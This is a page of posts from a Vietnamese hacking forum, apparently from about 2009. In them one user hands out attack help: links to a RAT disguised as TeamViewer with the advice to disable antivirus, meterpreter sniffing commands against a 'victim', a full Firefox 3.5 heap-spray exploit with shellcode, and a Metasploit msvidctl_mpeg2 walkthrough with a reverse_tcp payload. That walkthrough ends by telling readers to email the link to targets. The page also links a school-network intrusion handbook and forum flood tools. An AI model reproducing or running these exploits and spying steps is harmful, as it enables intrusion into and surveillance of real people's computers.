attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


lưu tập tin với phần mở rộng là .bat(vd:porn.bat smilie ),sau đó Double click vào nó để tạo 1 folder locker,1 thư mục mới có tên là Locker sẽ được tạo tại chỗ đó,bây giờ các bạn đem các file muốn ẩn vào thư mục locker đó,sau đó double click file batch đó để khóa lại thư mục có tên là Locker,nếu muốn unlock file các bạn chỉ việc double click file batch đó,nhập pass sau đó sẽ hiện ra lại các file đã bị ẩn
1 tài liệu rất hay hướng dẫn từng bước cơ bản "thâm nhập" mạng của trường học

lang:english

download:

http://www.zshare.net/download/628655271a7e60e8/


math man wrote:
bạn có quyển này ko ?
"The Hackers Underground Handbook"
http://learn-how-to-hack.net/index.php? 


"The Hackers Underground Handbook"




download:

/hvaonline/posts/list/29991.html

hoahongtim wrote:
Insecure.Org is pleased to announce the immediate, free availability of the Nmap Security Scanner version 5.00 from nmap.org. This is the first stable release since 4.76 (last September), and the first major release since the 4.50 release in 2007, download : http://nmap.org/download.html 


nhân tiện đây cho em hỏi xí ,câu lệnh sau của nmap có ý nghĩa gì:



Code:
holiganvn@root:~$nmap --reason -T4 www.hvaonline.net
Starting Nmap 5.0 ( http://insecure.org ) at 2009-07-17 16:46 ICT
Warning: Hostname www.hvaonline.net resolves to 2 IPs. Using 72.232.199.28.
Interesting ports on thutin.tienve.org (72.232.199.28):
Not shown: 1711 filtered ports
Reason: 1711 no-responses
PORT STATE SERVICE REASON
25/tcp open smtp syn-ack
80/tcp open http syn-ack
443/tcp open https syn-ack

connho wrote:
Cám ơn các bác. Em làm theo thấy ổn rồi.
Nhưng cho em hỏi là Dis Dr. Waston liêu có ảnh hưởng gì tới hệ thông không thế? 





Dr. Watson cho Windows là một trình gỡ lỗi chương trình chuyên thu thập thông tin về máy tính của bạn khi một lỗi (hoặc một lỗi chế độ người dùng) xảy ra với một chương trình. Nhóm hỗ trợ kỹ thuật có thể sử dụng thông tin mà Dr. Watson thu được và ghi lại để chẩn đoán một lỗi lỗi chương trình. Khi phát hiện lỗi, Dr. Watson sẽ tạo một tệp văn bản (Drwtsn32.log) có thể được chuyển tới nhân viên hỗ trợ theo cách họ muốn. Bạn cũng có tuỳ chọn tạo tệp kết xuất nhanh, là tệp nhị phân mà một lập trình viên có thể nạp vào trình gỡ lỗi.


nếu mà lỗi đã được khắc phục thì Dr. Watson sẽ không thông báo cho bạn biết nữa, và không gây ảnh hưởng đến hệ thống,xem thêm:

http://support.microsoft.com/kb/308538/vi-vn

khigiadano wrote:
Khi mình vào thì thấy có 1 nick "flood" post bài liên tục gần 200 bài liên tiếp luôn

Khắc phục thế nào các bạn nhỉ?
Mình hiện đang bật 2 bài viết cách nhau 30 giây đó
Còn làm gì thêm được ko ? 


bạn nện update lên phiên bản mới nhất của VBB:

http://www.vbulletin.com/forum/showthread.php?postid=1746892

hoặc nhờ sự giúp đỡ của VBB TEAM:

http://www.vbulletin.com/forum

cái tool flood đó ở đây nè:

http://ptithcm.org/forum/showthread.php?t=13506

hmtaccess wrote:
Cảm ơn bạn nhưng có thắc mắt ntn?
Trong VBF Team.exe
Có phần Mật khẩu victim là sao nhỉ. Cái này nên để trống hay sao ?
 


coi cái video này có "sáng ra" tì náo không:

http://www.mediafire.com/?fmta5yi53wx

chịu khó tìm tòi suy nghĩ đi bạn smilie

hmtaccess wrote:

holiganvn wrote:

Jino_Hoang wrote:
Sao không được ban ơi
Tui thử mấy lần mà nó co gủi gì đâu 


bạn đã có ftp acc chưa,nếu chưa thì vào đây đăng kí 1 cái:http://freevnn.com/ 

Khi chạy TeamViewer Rat.exe nó hiện lên một số thông sô va, 2 thông sô sau đây là gì vậy
Usuario
Clave
Và sau khi dụ được client rùi làm sao điều kiển vậy .... smilie smilie  


bạn tải theo link này có giao diện dùng cho nó dễ

http://www.megaupload.com/?d=HCHHXJ9F

sau khi login vào ftp acc,thấy có ID và PASS của victim thì dùng chương trình TeamViewer chính hãng mà xem trộm,download:

http://www.download.onboom.com/Bai_viet/Xem/642/31/

LƯU Ý:tắt AV trước khi xả nén file ra


vào được rồi thì sử dụng meterpreter để Sniff

Code:
meterpreter > help
…….
Sniffer Commands
================
Command Description
------- -----------
sniffer_dump Retrieve captured packet data
sniffer_interfaces list all remote sniffable interfaces
sniffer_start Capture packets on a previously opened interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet captures on the specified interface
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter >


hoặc biết thêm thông tin gì đó về victim:

Code:
meterpreter > sysinfo
Computer: victim
OS : Windows XP (Build 2600, Service Pack 2).
meterpreter >


chúc các bác thành công smilie

Jino_Hoang wrote:
Sao không được ban ơi
Tui thử mấy lần mà nó co gủi gì đâu 


bạn đã có ftp acc chưa,nếu chưa thì vào đây đăng kí 1 cái:http://freevnn.com/
LOL smilie ,bên metasploit đã cập nhật modun,link:

http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/multi/browser/firefox_escape_retval.rb

hướng dẫn add

http://carnal0wnage.blogspot.com/2008/07/adding-your-own-exploits-in-metasploit.html

hoặc ở đây:

/hvaonline/posts/list/21868.html
mã khai thác đã có trên milw0rm.com:

Code:
<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw </FONT>
</p>
</div>
<script language=JavaScript>
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
/* Heap Spray code */
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
function escapeData(data)
{
var i;
var c;
var escData='';
for(i=0;i<data.length;i++)
{
c=data.charAt(i);
if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
escData+=c;
}
return escData;
}
function DataTranslator(){
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["str"] = "blah";
var newElement = document.getElementById("content")
if (document.getElementsByTagName) {
var i=0;
pTags = newElement.getElementsByTagName("p")
if (pTags.length > 0)
while (i<pTags.length)
{
oTags = pTags[i].getElementsByTagName("font")
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}
function GenerateHTML()
{
var html = "";
for (i=1;i<searchArray.length;i++)
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>
# milw0rm.com [2009-07-13]


các bác update metasploit về để hack nhé

video khai thác lỗi:

http://www.youtube.com/watch?v=G_lNIByYXxE
các bác vào google,tìm kiếm với từ "fix Error Windown Explorer" hoặc "Windows Explorer Error Fix"

và đây là 1 ví dụ:

Code:
http://www.villanova.edu/artsci/college/it/support/explorer_error.htm

XxatoO wrote:
Mình đang xài laptop dv206tu. Sau 1 thời gian vọc phá với Mac OSx thì Windows vista home premium đã bị lỗi và không thể boot vào hệ thống được ( có lẽ là lỗi file boot do xuất hiện màng hình dumb và sau đó tự động restart lại).

Mình đã cài bản Windows Vista khác nhưng tình hình là không được ổn định cho lắm. Và trong quá trình vọc phá thì đã bị dell mất lun phân vùng RECOVERY (quá đen).

Mọi người ghóp ý cho mình với ( ai có bản RECOVERY thi share cho minh lụn nha) _ THANKS MỌI NGƯỜI ĐÃ ĐỌC TIN !  


nếu bạn mất cái đĩa RECOVERY,thì bạn nên đem đến nơi đã mua máy để họ phục hồi lại phân vùng
trong *nix thì các bác dùng lệnh dưới để cập nhật cho metasploit :

Code:
svn update



hướng dẫn khai thác 0-day in Microsoft DirectShow với metasploit:

em bắt đầu bằng cách chạy msfconsole sau khi Metasploit đã cập nhật phiên bản mới nhất:

Code:
holiganvn@root:~/svn/msf3-dev$ sudo ./msfconsole
[sudo] password for holiganvn:
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 166 aux
msf >



em nạp mô-đun khai thác:


Code:
msf > use exploit/windows/browser/msvidctl_mpeg2
msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(msvidctl_mpeg2) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Use SSL
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0



em thiết lập các biến Payload và Khai thác mô-đun:

Code:
msf exploit(msvidctl_mpeg2) > set SRVPORT 80
SRVPORT => 80
msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(msvidctl_mpeg2) > set URIPATH secure.html
URIPATH => secure.html
msf exploit(msvidctl_mpeg2) > exploit
[*] Exploit running as background job.
msf exploit(msvidctl_mpeg2) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using url: http://0.0.0.0:80/secure.html
[*] Local IP: http://192.168.1.158:80/secure.html
[*] Server started.



Bây giờ chúng ta có thể khai thác bug ở một tệp HTML với GIF để khai thác một mục tiêu. Bạn có thể gửi các liên kết đến một mục tiêu người sử dụng trong một thư điện tử hoặc thông qua bất cứ phương pháp khác và một khi người dùng nhấn vào liên kết và mở Internet Explorer,như vậy chúng ta đã có thể khai thác vào máy của victim:

link test:

Code:
http://fb.coru.in/0msvidctl.zip
 
Go to Page:  First Page Page 6 7 8 9 11 12 13 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|